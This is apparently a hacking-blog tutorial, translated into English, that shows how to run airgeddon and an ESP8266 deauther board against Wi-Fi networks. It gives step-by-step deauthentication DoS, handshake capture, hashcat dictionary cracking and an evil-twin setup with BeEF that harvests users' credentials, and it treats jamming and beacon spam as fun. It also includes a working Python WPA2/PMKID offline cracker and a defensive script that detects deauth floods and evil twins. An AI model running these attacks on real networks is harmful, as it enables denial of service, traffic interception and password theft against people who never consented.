Tools, vulnerabilities and attacks on wireless technologies. Evil twin and jammer board

Introduction

Welcome back, dear readers! We continue our series of articles “No pro-v-ode”, in which we review various tools, vulnerabilities and attacks on wireless technologies and protocols. Wi-Fi has become an integral part of everyday life: we use wireless networks to access the Internet, exchange data, stream video and music, and much more. But as Wi-Fi networks have spread, so has the risk to the information transmitted over them. In this article we use a powerful tool that helps assess the security of Wi-Fi networks and identify potential weaknesses, and a small board built for testing Wi-Fi security.

Disclaimer: all information in this article is taken from open sources and is not a call to action. It is provided only for familiarization with, and study of, the mechanisms behind the technologies used.

Airgeddon

Airgeddon is a versatile Bash script for auditing the security of wireless networks. It can attack WPS and WPA/WPA2-PSK passwords, run DoS, Evil Twin and Enterprise attacks, capture handshakes and PMKIDs, and it wraps a number of well-known tools (the aircrack-ng suite, mdk4, hashcat and others) behind a single menu.

Installation

To install the tool, clone its GitHub repository and run the script, which first checks that all the tools it depends on are present. Airgeddon needs root privileges, since it reconfigures wireless interfaces and launches the underlying attack tools, so run it with sudo or as root.

git clone https://github.com/v1s1t0r1sh3r3/airgeddon
cd airgeddon
sudo bash airgeddon.sh

The script checks for all required components on your machine. If any are missing, just press Enter and the script installs them automatically; once installation is finished, press Enter again to continue.

Next the script asks which wireless interface to use; in our case it is wlan1.

Usage

After that we see an extensive menu for working with the interface and exploring different kinds of attacks. For now we will skip the first group of options (interface handling) and focus on the attacks.

Let's start with the DoS attacks. For this we created a test Wi-Fi network, and all subsequent actions are performed against that network only.

Here we are shown another large menu in which the attacks are neatly grouped by category, from outdated and less effective ones to more modern and effective ones.

One tablet is connected to our access point; we will try the more effective attack methods.

But first the adapter has to be put into monitor mode and the Wi-Fi networks scanned.

Select the first attack, “amok mdk4 disconnect”. It is already aimed at the network we chose during the scan; if we had not scanned and selected a target first, we would have to enter the BSSID of the access point manually.

As you can see, the tool is fully automated: to launch the attack you just keep pressing Enter. That is how simple and clear everything is in this tool.

The result is excellent: clients were disconnected from the access point the moment the attack started. Let's test the next one, the “aireplay deauthentication” attack.

It disconnected the clients from the access point about two seconds later than the previous attack did.

Let's move on to the next section, the “Handshake/PMKID tools menu”.

As we can see, there are only two capture options here, PMKID capture and the classic handshake capture, and nothing more is really needed. A PMKID can be captured without any client present, but only if the access point includes a PMKID in the first message of the 4-way handshake; since the PMKID attack would be less effective against our access point, we choose the good old handshake.

We select the deauthentication method (in our case the first option) and set how often the deauthentication is repeated; we chose the minimum, 10 seconds.

Two windows then pop up, one monitoring and one deauthenticating, and once the handshake has been captured you are asked where to save the file.

Next, go to the “offline WPA/WPA2 decryption” item, where the file we just captured is already selected by default, then choose Personal.

We are then presented with an extensive menu of password brute-force options, divided into two groups: aircrack-ng attacks, which use the CPU only, and hashcat attacks, which can use the CPU or the GPU.

We select the third option, a hashcat dictionary attack, and point it at our wordlist.

Here is the password. Admittedly it is far too easy, but for testing and for a quick result we set it that way deliberately. Do not forget that many less experienced users set exactly such passwords, and the security of a WPA2-PSK network is nothing more than the strength of its passphrase: anyone holding a single captured handshake can test candidates offline, without ever touching the network again.
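To make clear what the “offline decryption” step actually computes, and why a PMKID and a handshake are interchangeable at the cracking stage, here is an added example in Python; it is not airgeddon's or hashcat's code. It implements the WPA2-PSK key derivation from IEEE 802.11i with the standard library only, builds a constructed handshake and PMKID for a made-up SSID, MAC addresses, nonces and passphrase, and then runs a small dictionary over them the way hashcat's WPA modes do. All names and values below are hypothetical.

```python
"""
Added example (not airgeddon's or hashcat's code): what the offline WPA2-PSK
dictionary attack computes. SSID, addresses, nonces, passphrase and wordlist
are all constructed for the demo.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # This is the expensive step per candidate and the reason GPU cracking pays off.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA). Access points that cache
    # PMKs send it in message 1 of the handshake, so no client is needed to capture it.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def kck_from_handshake(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce));
    # the first 128 bits of the PTK are the KCK, which keys the EAPOL MIC.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields preceding the 16-byte MIC (77)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2, key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    # Minimal EAPOL-Key message 2 (client -> AP, no key data), enough to show the layout.
    body = (b"\x02"                   # descriptor type: RSN
            + b"\x01\x0a"             # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x00"             # key length
            + (1).to_bytes(8, "big")  # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + b"\x00\x00")      # MIC, key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    # Recompute the MIC for each candidate and compare with the captured one.
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = kck_from_handshake(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def crack_pmkid(ssid, ap_mac, sta_mac, captured_pmkid, wordlist):
    # Same PBKDF2 cost per candidate, but only one HMAC instead of PRF-512 plus MIC.
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac), captured_pmkid):
            return candidate
    return None


# Constructed test material (hypothetical SSID, addresses, nonces, passphrase, wordlist).
SSID = "LabAP-Test"
AP_MAC = bytes.fromhex("02aabbcc0001")
STA_MAC = bytes.fromhex("02aabbcc0002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
REAL_PASSPHRASE = "qwerty123"
WORDLIST = ["password", "12345678", "qwerty123", "letmein1"]


def make_capture():
    # Simulate what the capture step would record from a real client association.
    pmk = pmk_from_passphrase(REAL_PASSPHRASE, SSID)
    kck = kck_from_handshake(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    msg2 = build_eapol_msg2(SNONCE)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + 16:]
    return msg2, pmkid(pmk, AP_MAC, STA_MAC)


if __name__ == "__main__":
    frame, captured_pmkid = make_capture()
    print("handshake:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, WORDLIST))
    print("pmkid:    ", crack_pmkid(SSID, AP_MAC, STA_MAC, captured_pmkid, WORDLIST))
```

The pure-Python loop is far slower than hashcat, but it is the same computation: for every candidate one PBKDF2 with 4096 iterations, then either one HMAC (PMKID) or the PRF-512 plus the EAPOL MIC (handshake). Nothing in it depends on the network being reachable, which is why a weak passphrase cannot be protected by anything the access point does after the handshake has been recorded.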

Let's also look at the “Evil Twin” menu. As we can see, there are options for traffic sniffing; let's try the most interesting one, item 8. For this attack we connect a third Wi-Fi adapter, which gives the fake access point its upstream connection so that victims' traffic can be forwarded and inspected. After selecting this menu item you will see the following:

If BeEF is installed and everything is OK, go to option 1; to check, use option 2. In our case everything is fine.

Next, select everything as before and move on to the next step.

For this we connected the third adapter and chose the wlan2 interface. After all parameters are set, six windows open; the ones that matter most are the top-right and bottom-right windows: the top one shows connected clients and the bottom one shows which pages they are visiting.

When the attack ends, press Enter and the tool reports whether any usernames and passwords were captured; intercepted credentials are written to a file.

We will skip WPS attacks, since their concept should already be clear to everyone, and WEP attacks, which are outdated and in most cases no longer relevant. Enterprise attacks we unfortunately had no opportunity to test, but so that there is at least an understanding of them, a brief explanation:

Attacks on WPA2-Enterprise networks target the authentication servers and the key management of enterprise networks rather than a shared passphrase. WPA-Enterprise uses 802.1X/EAP to authenticate wireless clients against a RADIUS server, which allows different authentication methods such as client certificates or a username and password. The typical attack in this class is therefore an evil twin with a rogue RADIUS server: a client that does not validate the server's certificate hands the attacker its credentials, or a challenge/response pair (for example MSCHAPv2) that can be cracked offline. Such attacks may also include attempts to compromise the authentication servers themselves or physical attacks on network equipment.

That is basically everything we wanted to tell you about this tool. To sum up: it is functional and convenient, and it has features not found in most similar tools, for example a fake access point that intercepts all of the traffic on the network.

ESP8266_deauther

This ESP8266 firmware is designed for testing 802.11 networks, including the ability to run a deauthentication attack that disconnects devices from a Wi-Fi network. The project is useful for learning about Wi-Fi, Arduino, electronics and programming, and it lets you check how your own devices react to such attacks and tighten the network's security if necessary.

Specifications

  • Modification: HW-628 v.1.1

  • Wireless interface: Wi-Fi 802.11 b/g/n 2.4 GHz

  • Rated voltage: 5-9V

  • Flash memory: 32 Mbit (4 MB); vendor listings that say “32 MB” mean megabits

  • Dimensions: 49×25 mm

Installation

  • Download the firmware binary from the project's official repository.

  • Download the Windows flashing utility (64-bit or 32-bit build, depending on your system).

  • Launch the flasher:

To find the required COM port, open Control Panel\Hardware and Sound\Device Manager and expand the “Ports (COM and LPT)” tree. Then simply unplug and reconnect the device and see which port appears.

Go to the Config tab and select the path to the firmware.

The Advanced tab should look like this.

Finally, click Flash to start writing the firmware to the device.

After flashing succeeds, restart the device; it now broadcasts its own access point, by default with the SSID pwned and the password deauther. Change these defaults straight away: anyone in range who knows them can connect and control the board.

Connect to that access point, open a browser and go to 192.168.4.1 to reach the control panel.

Now let's scan the access points around us and try something. We created a test access point with one device connected to it.

Click Select and go to Clients.

As we can see, there is indeed one device connected to the access point. If we wish we can select specific devices, but in our case that is clearly unnecessary, so we leave everything as it is and go to the Attack item.

The first option is clear: client deauthentication, and it works quite well. Note that it relies on forged, unauthenticated management frames, so clients and access points that enforce Protected Management Frames (802.11w, mandatory in WPA3) simply ignore them. The next option clones the target access point. It looks like this.

To carry out the next attack you need to prepare a list of Wi-Fi networks with which to “saturate” users who do not understand what is going on. There are several ways to build such a list: use the method shown above (silencing one access point and launching others with the same name as the original), generate a random list of access points, or write your own list. I think we all understand which of these options is the most interesting.

Launch it all and we get this beauty.

In this way you can carry out combined attacks: jam one access point and at the same time launch other access points whose names carry a message of your own. This unconventional way of attracting attention can arouse the interest of a crowd, because the Wi-Fi disconnection forces people to open their network settings to understand why it failed, and there they see your message. Such activities can be used for various purposes, including social experiments, network security testing, or simply for fun. It is important to remember the legality and ethics of such actions, so as not to violate users' rights or harm their interests!
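The deauthentication attacks shown with airgeddon above (“amok mdk4” and “aireplay deauthentication”) and with the deauther board here, and the cloned access points of the last two steps, leave a very recognisable signature in the air. As an added example, not part of the article or of either tool, the Python below builds constructed 802.11 management frames (hypothetical MAC addresses and SSID) and runs a minimal detector over them: a burst of deauthentication frames from one BSSID within a short window, and a beacon that advertises a known SSID from a BSSID that is not on the allowlist. The frame layout follows IEEE 802.11 (24-byte management header, 2-byte reason code for deauthentication, fixed fields plus the SSID element for beacons); the threshold and window are arbitrary.

```python
"""
Added example (not part of the article, airgeddon or the deauther firmware):
a minimal detector for deauthentication floods and cloned SSIDs, fed with
constructed raw 802.11 management frames.
"""
import struct
from collections import defaultdict

DEAUTH = 0xC0  # frame control byte 0: type 0 (management), subtype 12 (deauthentication)
BEACON = 0x80  # type 0, subtype 8 (beacon)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype: int, dst: bytes, src: bytes, bssid: bytes, body: bytes) -> bytes:
    # 24-byte management header: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2), then body.
    return bytes([subtype, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


def build_deauth(dst: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    # Body is just the 2-byte reason code (7 = class 3 frame from non-associated station).
    return build_mgmt(DEAUTH, dst, src, bssid, struct.pack("<H", reason))


def build_beacon(bssid: bytes, ssid: str) -> bytes:
    # Fixed fields: timestamp(8) beacon interval(2) capabilities(2), then element 0 (SSID).
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0431)
    tag = bytes([0, len(ssid)]) + ssid.encode()
    return build_mgmt(BEACON, b"\xff" * 6, bssid, bssid, fixed + tag)


def parse(frame: bytes):
    """Return the fields the detector needs, or None for unhandled or truncated frames."""
    if len(frame) < 24:
        return None
    kind = frame[0] & 0xFC  # drop the two protocol-version bits
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    if kind == DEAUTH and len(frame) >= 26:
        return {"kind": kind, "dst": addr1, "src": addr2, "bssid": addr3,
                "reason": struct.unpack_from("<H", frame, 24)[0]}
    if kind == BEACON and len(frame) >= 38 and frame[36] == 0:
        n = frame[37]
        if len(frame) < 38 + n:
            return None  # truncated SSID element: do not trust the length byte
        return {"kind": kind, "bssid": addr3, "ssid": frame[38:38 + n].decode("utf-8", "replace")}
    return None


def analyze(frames, known_aps, window_s=1.0, deauth_threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame) in time order.
    known_aps: {ssid: {bssid_bytes, ...}} allowlist of your own access points.
    Returns a list of alert strings; each BSSID is reported once per condition."""
    recent = defaultdict(list)  # bssid -> timestamps of deauth frames inside the window
    alerts, seen = [], set()
    for ts, raw in frames:
        f = parse(raw)
        if f is None:
            continue
        if f["kind"] == DEAUTH:
            q = recent[f["bssid"]]
            q.append(ts)
            while q and ts - q[0] > window_s:
                q.pop(0)
            key = ("deauth", f["bssid"])
            if len(q) >= deauth_threshold and key not in seen:
                seen.add(key)
                alerts.append(f"deauth flood from BSSID {mac_str(f['bssid'])}: "
                              f"{len(q)} frames in {window_s}s")
        elif f["kind"] == BEACON:
            key = ("twin", f["bssid"], f["ssid"])
            if f["ssid"] in known_aps and f["bssid"] not in known_aps[f["ssid"]] and key not in seen:
                seen.add(key)
                alerts.append(f"SSID {f['ssid']!r} advertised by unknown BSSID "
                              f"{mac_str(f['bssid'])} (possible evil twin)")
    return alerts


# Constructed capture (hypothetical addresses and SSID).
REAL_AP = bytes.fromhex("02aabbcc0001")
ROGUE_AP = bytes.fromhex("02deadbeef01")
CLIENT = bytes.fromhex("02aabbcc0002")
KNOWN_APS = {"LabAP-Test": {REAL_AP}}


def sample_capture():
    frames = [(0.0, build_beacon(REAL_AP, "LabAP-Test"))]
    # 20 spoofed broadcast deauths "from" the real AP within 0.4 s, as a jammer would send.
    frames += [(1.0 + i * 0.02, build_deauth(b"\xff" * 6, REAL_AP, REAL_AP)) for i in range(20)]
    frames.append((2.0, build_beacon(ROGUE_AP, "LabAP-Test")))  # clone of the target SSID
    frames.append((5.0, build_deauth(CLIENT, REAL_AP, REAL_AP, reason=3)))  # one ordinary deauth
    return frames


if __name__ == "__main__":
    for line in analyze(sample_capture(), KNOWN_APS):
        print(line)
```

On a real capture you would feed it frames from a monitor-mode interface (via scapy or a pcap reader) instead of sample_capture(). A flood is visible even on a network that enforces 802.11w, where clients discard the forged frames, so the alert still tells you someone is jamming; the evil-twin check needs an allowlist of your own BSSIDs, without which a cloned SSID is indistinguishable from a second legitimate access point.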

The settings section offers the following options: changing the name of the board's access point, setting a new password, hiding the network name, setting the deauthentication interval and other connection parameters. This makes it easy to configure the board's own access point for both security and convenience.

Conclusion

Today we looked at another extensive and useful tool for testing the security of Wi-Fi networks, and, as a bonus, a hardware board for interacting with wireless networks.

Subscribe to LHMedia:

Life-Hack – Hacker / Hacking